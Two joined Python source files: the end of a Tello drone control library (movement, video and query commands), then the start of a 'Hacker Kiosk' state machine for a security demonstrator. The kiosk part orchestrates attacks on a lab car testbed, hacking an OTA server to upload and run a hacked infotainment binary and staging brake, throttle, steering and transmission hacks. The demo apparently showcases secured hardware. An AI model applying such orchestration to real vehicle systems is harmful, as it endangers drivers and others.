self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
if robust:
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
first_response = responses.pop(0) # first datum from socket
try:
response = first_response.decode("utf-8")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return "response decode error"
response = response.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return "ok"
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
        # Commands sent in rapid succession can make the drone unresponsive, so wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT, robust:bool = False) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
response = self.send_command_with_return(command, timeout=timeout, robust=robust)
if robust:
for i in range(0, self.retry_count):
if 'ok' in response.lower():
self.is_alive = True
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
return True
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
        Parses the response to a float
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
"""Used to reaise an error after an unsuccessful command
Internal method, you normally wouldn't call this yourself.
"""
tries = 1 + self.retry_count
raise TelloException("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'"
.format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command", robust=True)
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise TelloException('Did not receive a state packet from the Tello')
def send_keepalive(self):
"""Send a keepalive packet to prevent the drone from landing after 15s
"""
self.send_control_command("keepalive")
def turn_motor_on(self):
"""Turn on motors without flying (mainly for cooling)
"""
self.send_control_command("motoron")
def turn_motor_off(self):
"""Turns off the motor cooling mode
"""
self.send_control_command("motoroff")
def initiate_throw_takeoff(self):
"""Allows you to take off by throwing your drone within 5 seconds of this command
"""
self.send_control_command("throwfly")
self.is_flying = True
def takeoff(self):
"""Automatic takeoff.
"""
        # Sometimes it takes a long time for the drone to take off and report a
        # successful takeoff, so we wait. Otherwise the following calls would fail.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
        when your computer is connected to Tello-XXXXXX WiFi network).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_command_without_return("emergency")
self.is_flying = False
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-3600
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, an exception is raised.
- x1/x2, y1/y2 and z1/z2 can't all be between -20 and 20 at the same time, but they can all be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, an exception is raised.
- x1/x2, y1/y2 and z1/z2 can't all be between -20 and 20 at the same time, but they can all be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions, the detection frequency is 10Hz;
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
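# A hedged sketch of continuous control with send_rc_control (not part of the
# original module; it assumes `tello` is already connected and flying):
#
#   import time
#   for _ in range(50):                      # roughly 5 s forward at half speed
#       tello.send_rc_control(0, 50, 0, 0)   # left/right, fwd/back, up/down, yaw
#       time.sleep(0.1)
#   tello.send_rc_control(0, 0, 0, 0)        # stop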
def set_wifi_credentials(self, ssid: str, password: str):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_control_command(cmd, robust=True)
def connect_to_wifi(self, ssid: str, password: str):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_control_command(cmd, robust=True)
def set_network_ports(self, state_packet_port: int, video_stream_port: int):
"""Sets the ports for state packets and video streaming
While you can use this command to reconfigure the Tello this library currently does not support
non-default ports (TODO!)
"""
self.video_stream_port = video_stream_port
cmd = 'port {} {}'.format(state_packet_port, video_stream_port)
self.send_control_command(cmd)
def reboot(self):
"""Reboots the drone
"""
self.send_command_without_return('reboot')
def set_video_bitrate(self, bitrate: int):
"""Sets the bitrate of the video stream
Use one of the following for the bitrate argument:
Tello.BITRATE_AUTO
Tello.BITRATE_1MBPS
Tello.BITRATE_2MBPS
Tello.BITRATE_3MBPS
Tello.BITRATE_4MBPS
Tello.BITRATE_5MBPS
"""
cmd = 'setbitrate {}'.format(bitrate)
self.send_control_command(cmd)
def set_video_resolution(self, resolution: str):
"""Sets the resolution of the video stream
Use one of the following for the resolution argument:
Tello.RESOLUTION_480P
Tello.RESOLUTION_720P
"""
cmd = 'setresolution {}'.format(resolution)
self.send_control_command(cmd)
def set_video_fps(self, fps: str):
"""Sets the frames per second of the video stream
Use one of the following for the fps argument:
Tello.FPS_5
Tello.FPS_15
Tello.FPS_30
"""
cmd = 'setfps {}'.format(fps)
self.send_control_command(cmd)
def set_video_direction(self, direction: int):
"""Selects one of the two cameras for video streaming
The forward camera is the regular 1080x720 color camera
The downward camera is a grey-only 320x240 IR-sensitive camera
Use one of the following for the direction argument:
Tello.CAMERA_FORWARD
Tello.CAMERA_DOWNWARD
"""
cmd = 'downvision {}'.format(direction)
self.send_control_command(cmd)
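# A minimal video-configuration sketch (not part of the original module; it
# assumes firmware that supports the set* commands listed above):
#
#   tello.streamon()
#   tello.set_video_resolution(Tello.RESOLUTION_720P)
#   tello.set_video_fps(Tello.FPS_30)
#   tello.set_video_bitrate(Tello.BITRATE_AUTO)
#   tello.set_video_direction(Tello.CAMERA_FORWARD)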
def send_expansion_command(self, expansion_cmd: str):
"""Sends a command to the ESP32 expansion board connected to a Tello Talent
Use e.g. tello.send_expansion_command("led 255 0 0") to turn the top led red.
"""
cmd = 'EXT {}'.format(expansion_cmd)
self.send_control_command(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def query_active(self) -> str:
"""Get the active status
Returns:
str
"""
return self.send_read_command('active?')
def end(self):
"""Call this method when you want to end the tello object
"""
try:
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
except TelloException:
pass
if self.background_frame_read is not None:
self.background_frame_read.stop()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class reads frames in the background using PyAV or OpenCV (depending on
the selected video frontend). Use backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address, callback):
self.tello = tello
self.address = address
self.frame = np.zeros([300, 400, 3], dtype=np.uint8)
self.video_frontend = tello.video_frontend
self.callback = callback
# Try grabbing frame with PyAV
# According to issue #90 the decoder might need some time
# https://github.com/damiafuentes/DJITelloPy/issues/90#issuecomment-855458905
# TODO check out parameters http://underpop.online.fr/f/ffmpeg/help/format-options.htm.gz
Tello.LOGGER.debug('trying to grab video frames...')
now = time.time()
if self.video_frontend == 'av':
with tello.av_open_lock:
self.container = av.open(self.address, format="h264")
elif self.video_frontend == 'opencv':
#os.environ['OPENCV_FFMPEG_CAPTURE_OPTIONS'] = 'preset:ultrafast;vcodec:libx264;tune:zerolatency;pixel_format:yuv420p;video_size:960x720'
self.container = cv.VideoCapture(self.address,cv.CAP_FFMPEG)
else:
Tello.LOGGER.error("Stopped video process!")
Tello.LOGGER.error("Unknown video_frontend (%s). It can be either 'opencv' or 'av'." % self.video_frontend)
return
Tello.LOGGER.info('dt %.4f' % (time.time() - now))
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
"""Start the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.worker.start()
def update_frame(self):
"""Thread worker function to retrieve frames using PyAV
Internal method, you normally wouldn't call this yourself.
"""
if self.video_frontend == 'av':
for frame in self.container.decode(video=0):
self.frame = np.array(frame.to_image())
self.callback(self.frame)
self.tello.last_video_frame_received = time.time()
self.is_alive = True
if self.stopped:
self.container.close()
break
elif self.video_frontend == 'opencv':
while True:
ret, frame = self.container.read()
self.frame = np.array(frame)
self.callback(self.frame)
self.tello.last_video_frame_received = time.time()
self.is_alive = True
if self.stopped:
self.container.release()
break
else:
raise Exception("Unsupported video frontend: %s" % self.video_frontend)
def stop(self):
"""Stop the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.stopped = True
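# A hedged end-to-end sketch of grabbing frames (not part of the original
# module; it assumes `Tello.get_frame_read()` returns the BackgroundFrameRead
# instance, as the streamon docstring suggests):
#
#   tello = Tello()
#   tello.connect()
#   tello.streamon()
#   reader = tello.get_frame_read()
#   frame = reader.frame      # latest decoded frame as a numpy array
#   tello.streamoff()
#   tello.end()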
|
kiosk.py
|
"""
Project: SSITH CyberPhysical Demonstrator
kiosk.py
Author: Ethan Lew <elew@galois.com>
Date: 06/09/2021
Python 3.8.3
O/S: Windows 10
Kiosk State Machine
Hacker Kiosk backend
Exchange format:
{
func: "name-of-the-function-to-be-called",
args: {"dictionary of arguments}
resp: {"dictionary of return vaues}
status: response status
200 -OK
500 - unexpected failure
501 - func not implemented
}
NOTE: Scenarios are:
1) BASELINE
* Target1 (ECU) + Target4 (Debian) + Infotainment_server_1
2) SECURE_INFOTAINMENT
* Target2 (ECU) + Target5 (Debian, secure!) + Infotainment_server_2
3) SECURE_ECU
* Target3 (ECU, secure!) + Target6 (Debian) + Infotainment_server_3
"""
import cyberphyslib.kiosk.client as kclient
import cyberphyslib.canlib as canlib
from can import Message
from transitions.extensions import GraphMachine as Machine
from transitions import State
import threading
import zmq
import struct
import subprocess
def page(f):
"""decorator for page action methods"""
def inner(*args, **kwargs):
"""NOTE: make this log instead of print"""
print(f">>>STATE: {f.__name__}")
return f(*args, **kwargs)
return inner
ComponentDictionary = {
canlib.SCENARIO_BASELINE: "SCENARIO_BASELINE",
canlib.SCENARIO_SECURE_ECU: "SCENARIO_SECURE_ECU",
canlib.SCENARIO_SECURE_INFOTAINMENT: "SCENARIO_SECURE_INFOTAINMENT",
canlib.BESSPIN_TOOL: "BESSPIN_TOOL",
canlib.TARGET_1: "TARGET_1",
canlib.TARGET_2: "TARGET_2",
canlib.TARGET_3: "TARGET_3",
canlib.TARGET_4: "TARGET_4",
canlib.TARGET_5: "TARGET_5",
canlib.TARGET_6: "TARGET_6",
canlib.TEENSY: "TEENSY",
canlib.IGNITION: "IGNITION",
canlib.LED_COMPONENT: "LED_COMPONENT",
canlib.HACKER_KIOSK: "HACKER_KIOSK",
canlib.HACK_NONE: "HACK_NONE",
canlib.HACK_OTA: "HACK_OTA",
canlib.HACK_BRAKE: "HACK_BRAKE",
canlib.HACK_THROTTLE: "HACK_THROTTLE",
canlib.HACK_TRANSMISSION: "HACK_TRANSMISSION",
canlib.HACK_LKAS: "HACK_LKAS",
canlib.HACK_INFOTAINMENT_1: "HACK_INFOTAINMENT_1",
canlib.HACK_INFOTAINMENT_2: "HACK_INFOTAINMENT_2",
canlib.INFOTAINMENT_THIN_CLIENT: "INFOTAINMENT_THIN_CLIENT",
canlib.INFOTAINMENT_SERVER_1: "INFOTAINMENT_SERVER_1",
canlib.INFOTAINMENT_SERVER_2: "INFOTAINMENT_SERVER_2",
canlib.INFOTAINMENT_SERVER_3: "INFOTAINMENT_SERVER_3",
canlib.OTA_UPDATE_SERVER_1: "OTA_UPDATE_SERVER_1",
canlib.OTA_UPDATE_SERVER_2: "OTA_UPDATE_SERVER_2",
canlib.OTA_UPDATE_SERVER_3: "OTA_UPDATE_SERVER_3",
canlib.BUTTON_STATION_1: "BUTTON_STATION_1",
canlib.BUTTON_STATION_2: "BUTTON_STATION_2",
canlib.BUTTON_STATION_3: "BUTTON_STATION_3",
canlib.BUTTON_VOLUME_DOWN: "BUTTON_VOLUME_DOWN",
canlib.BUTTON_VOLUME_UP: "BUTTON_VOLUME_UP"
}
ButtonDictionary = {
canlib.BUTTON_STATION_1: "BUTTON_STATION_1",
canlib.BUTTON_STATION_2: "BUTTON_STATION_2",
canlib.BUTTON_STATION_3: "BUTTON_STATION_3",
canlib.BUTTON_VOLUME_DOWN: "BUTTON_VOLUME_DOWN",
canlib.BUTTON_VOLUME_UP: "BUTTON_VOLUME_UP"
}
class HackerKiosk:
"""
Kiosk Director implements the desired state flow for the hacker kiosk experience
"""
ZMQ_PORT = 5091
ZMQ_POLL_TIMEOUT = 0.1
OTA_SERVER_IP = {
canlib.SCENARIO_BASELINE: "10.88.88.11",
canlib.SCENARIO_SECURE_INFOTAINMENT: "10.88.88.21",
canlib.SCENARIO_SECURE_ECU: "10.88.88.31",
}
INFO_SERVER_HACKED_PATH = "/home/pi/BESSPIN-Tool-Suite/BESSPIN-LFS/GFE/appsBinaries/infotainment-server/debian/hacked_server.elf"
ECU_HACKS_PATH = "/home/pi/BESSPIN-Tool-Suite/BESSPIN-LFS/GFE/appsBinaries/ecu-hacks/"
BRAKES_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"brakeNominal"
BRAKES_HACKED_HACK_PATH = ECU_HACKS_PATH +"brakeHacked"
THROTTLE_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"throttleNominal"
THROTTLE_HACKED_HACK_PATH = ECU_HACKS_PATH +"throttleHacked"
LKAS_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"lkasNominal"
LKAS_HACKED_HACK_PATH = ECU_HACKS_PATH +"lkasHacked"
TRANSMISSION_NOMINAL_HACK_PATH = ECU_HACKS_PATH +"gearNominal"
TRANSMISSION_HACKED_HACK_PATH = ECU_HACKS_PATH +"gearHacked"
# full name of the states
state_names = [
"reset", # reset SSITH ECU scenario components here
"hack02_kiosk_intro",
"hack05_info_attempt",
"hack06_info_exploit",
"hack06_info_exploit_attemp_hack",
"hack08_critical_exploit",
"hack09_protect",# reset Baseline scenario components here
"hack10_protect_info_attempt",
"hack10_info_exploit_attempt_hack",
"hack12_protect_critical",
"hack12_critical_exploit"
]
# this is a brief description of the state transitions that is expanded at runtime
# into pytransitions transitions (a sketch of one expanded entry follows the list below)
transition_names = [
{'transition': ('reset', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('reset', 'hack02_kiosk_intro'), 'conditions': 'button_pressed_next'},
{'transition': ('hack02_kiosk_intro', 'hack05_info_attempt'), 'conditions': 'button_pressed_next'},
{'transition': ('hack05_info_attempt', 'hack06_info_exploit'), 'conditions': 'button_pressed_next'},
{'transition': ('hack06_info_exploit', 'hack06_info_exploit_attemp_hack'), 'conditions': 'button_pressed_info_exploit'},
{'transition': ('hack06_info_exploit_attemp_hack', 'hack06_info_exploit'), 'conditions': 'exploit_complete'},
{'transition': ('hack06_info_exploit', 'hack08_critical_exploit'), 'conditions': 'button_pressed_critical_exploit'},
{'transition': ('hack08_critical_exploit', 'hack06_info_exploit'), 'conditions': 'exploit_complete'},
{'transition': ('hack06_info_exploit', 'hack09_protect'), 'conditions': 'button_pressed_next'},
{'transition': ('hack09_protect', 'hack10_protect_info_attempt'), 'conditions': 'button_pressed_ssith_infotainment'},
{'transition': ('hack10_protect_info_attempt', 'hack10_info_exploit_attempt_hack'), 'conditions': 'button_pressed_info_exploit'},
{'transition': ('hack10_info_exploit_attempt_hack', 'hack10_protect_info_attempt'), 'conditions': 'exploit_complete'},
{'transition': ('hack09_protect', 'hack12_protect_critical'), 'conditions': 'button_pressed_ssith_ecu'},
{'transition': ('hack12_protect_critical', 'hack12_critical_exploit'), 'conditions': 'button_pressed_critical_exploit'},
{'transition': ('hack12_critical_exploit', 'hack12_protect_critical'), 'conditions': 'exploit_complete'},
{'transition': ('hack02_kiosk_intro', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack05_info_attempt', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack06_info_exploit', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack09_protect', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack10_protect_info_attempt', 'reset'), 'conditions': 'button_pressed_reset'},
{'transition': ('hack12_protect_critical', 'reset'), 'conditions': 'button_pressed_reset'},
]
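# A sketch of how one entry above is expanded by prepare_state_machine() into a
# pytransitions transition dict (illustration only, not part of the original code):
#
#   {'trigger': 'next_state', 'source': 'reset', 'dest': 'reset',
#    'before': 'set_arg', 'conditions': 'button_pressed_reset'}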
def __init__(self, net_conf, deploy_mode=True):
"""kiosk state machine"""
assert(net_conf)
self.deploy_mode = deploy_mode
self.states = None
self.transitions = None
self.inputs = None
self.machine = self.prepare_state_machine()
self.state_arg = None
self.is_reset_completed = False
self.stop_evt = threading.Event()
# ZMQ init
self.zmq_port = net_conf.port_network_ipcPort
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REP)
self.socket.bind(f"tcp://*:{self.zmq_port}")
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
# State machine data
self.active_scenario = canlib.SCENARIO_BASELINE
self.ota_server_port = net_conf.port_network_otaServerPort
self.brakes_ok = True
self.lkas_disabled = True
self.transmission_ok = True
self.throttle_ok = True
self.hack12_has_been_initialized = False
self.x = 0.0
self.y = 0.0
self.z = 0.0
self.ota_server = None
# IPC message
self.ipc_msg = {}
# CMD BUS
cmd_host, cmd_subscribers = net_conf.getCmdNetworkNodes("HackerKiosk")
self.cmd_bus = canlib.TcpBus(cmd_host, cmd_subscribers)
# CAN UDP BUS (For hacked infotainment server)
print(f"<{self.__class__.__name__}> UDP bus listening at {net_conf.nodes['HackerKiosk']}:{net_conf.port_network_hackedInfotainmentPort}")
self.infotainment_bus = canlib.UdpBus(port=net_conf.port_network_hackedInfotainmentPort,ip="")
self.cmd_thread = threading.Thread(target=self.cmdLoop, args=[], daemon=True)
self.info_thread = threading.Thread(target=self.infoLoop, args=[], daemon=True)
print(f"<{self.__class__.__name__}> Listening on ZMQ_PORT {self.zmq_port}")
self.default_inputs()
def run(self):
self.cmd_thread.start()
self.info_thread.start()
while not self.stopped:
msgs = dict(self.poller.poll(HackerKiosk.ZMQ_POLL_TIMEOUT))
if self.socket in msgs and msgs[self.socket] == zmq.POLLIN:
req = self.socket.recv_json()
print(f"<{self.__class__.__name__}> Got request: {req}")
self.ipc_msg['args'] = req['args']
self.ipc_msg['func'] = req['func']
self.submit_button(self.ipc_msg['func'],self.ipc_msg['args'])
self.socket.send_json(self.ipc_msg)
else:
self.next_state([])
def stop(self):
self.stop_evt.set()
@property
def stopped(self):
return self.stop_evt.is_set()
def exit(self):
self.stop()
def infoLoop(self):
"""Purpose of this function is to listen
to position updates from the hacked infotainment server
"""
print(f"<{self.__class__.__name__}> Info loop started")
while True:
msg = self.infotainment_bus.recv()
if msg:
cid, data = msg.arbitration_id, msg.data
try:
# NOTE: we need to listen to the CAN_ID_CAR_X/Y/Z/R from the hacked server
# Make sure we are listening for the right IP address
if cid == canlib.CAN_ID_CAR_X:
# Get X coordinate
self.x = struct.unpack(canlib.CAN_FORMAT_CAR_X, data)[0]
elif cid == canlib.CAN_ID_CAR_Y:
# Get Y coordinate
self.y = struct.unpack(canlib.CAN_FORMAT_CAR_Y, data)[0]
elif cid == canlib.CAN_ID_CAR_Z:
# Get Z coordinate
self.z = struct.unpack(canlib.CAN_FORMAT_CAR_Z, data)[0]
except Exception as exc:
print(f"<{self.__class__.__name__}> Error processing message: {msg}: {exc}")
def cmdLoop(self):
print(f"<{self.__class__.__name__}> Cmd loop started")
while True:
msg = self.cmd_bus.recv()
if msg:
cid, data = msg.arbitration_id, msg.data
try:
# NOTE: Do something else here?
print(f"<{self.__class__.__name__}> CMD_BUS CAN_ID={hex(cid)}, data={data}")
except Exception as exc:
print(f"<{self.__class__.__name__}> Error processing message: {msg}: {exc}")
@property
def is_finished(self):
"""state machine termination condition"""
return False
def default_inputs(self):
"""set all button inputs to false"""
for inp in self.inputs:
setattr(self, f'{inp}', False)
def resetEcuState(self):
self.brakes_ok = True
self.lkas_disabled = True
self.transmission_ok = True
self.throttle_ok = True
self.x = 0.0
self.y = 0.0
self.z = 0.0
def submit_button(self, button_name, arg):
"""activate a button input and send the kiosk to the next state"""
self.default_inputs()
if hasattr(self, f'button_pressed_{button_name}'):
setattr(self, f'button_pressed_{button_name}', True)
else:
print(f"Error: unknown button: {button_name}")
pass
self.next_state(arg)
def set_arg(self, arg=None):
"""setter for arguments shared between button call and state"""
self.state_arg = arg
def prepare_state_machine(self):
"""expand state machine description and create pytransitions machine"""
# create state objects from state name
self.states = [State(name=s, on_enter=f'{s}_enter') for s in self.state_names]
# create transition objects from static transition description
self.transitions = []
self.inputs = set()
for tn in self.transition_names:
base_dict = {'trigger': 'next_state',
'source': tn['transition'][0],
'dest': tn['transition'][1],
'before': 'set_arg'}
if 'conditions' in tn:
base_dict['conditions'] = tn['conditions']
self.inputs |= {tn['conditions']}
if 'unless' in tn:
base_dict['unless'] = tn['unless']
self.inputs |= {tn['unless']}
self.transitions.append(base_dict)
return Machine(self, states=self.states, transitions=self.transitions, initial='reset', show_conditions=True)
def draw_graph(self, fname: str):
"""draw a fsm graphviz graph (for documentation, troubleshooting)
NOTE: you will need to install graphviz (with dot)
"""
self.machine.get_graph().draw(fname, prog='dot')
def hack_ota_and_upload_hacked_infotainment_server(self) -> bool:
"""
1) Hack OTA server
2) if 1) successful, upload and execute hacked info server binary
"""
print("Attempting to hack OTA server.")
if self.deploy_mode:
print("Uploading the hacked infotainment server")
hack_ok, data = self.ota_server.upload_and_execute_file(HackerKiosk.INFO_SERVER_HACKED_PATH)
if hack_ok:
print("Hack successful!")
else:
print(f"Hack failed with: {data}")
else:
print("Hack successful!")
print("Uploading hacked infotainment server")
print("Upload successful!")
hack_ok = True
return hack_ok
@page
def reset_enter(self, arg):
"""
Switch to BASELINE_SCENARIO
* no active hack
* scenario is Baseline
* reset Target1, InfoServer1, InfoServer3
"""
self.button_pressed_next = False
self.button_pressed_reset = False
self.hackActive(canlib.HACK_NONE)
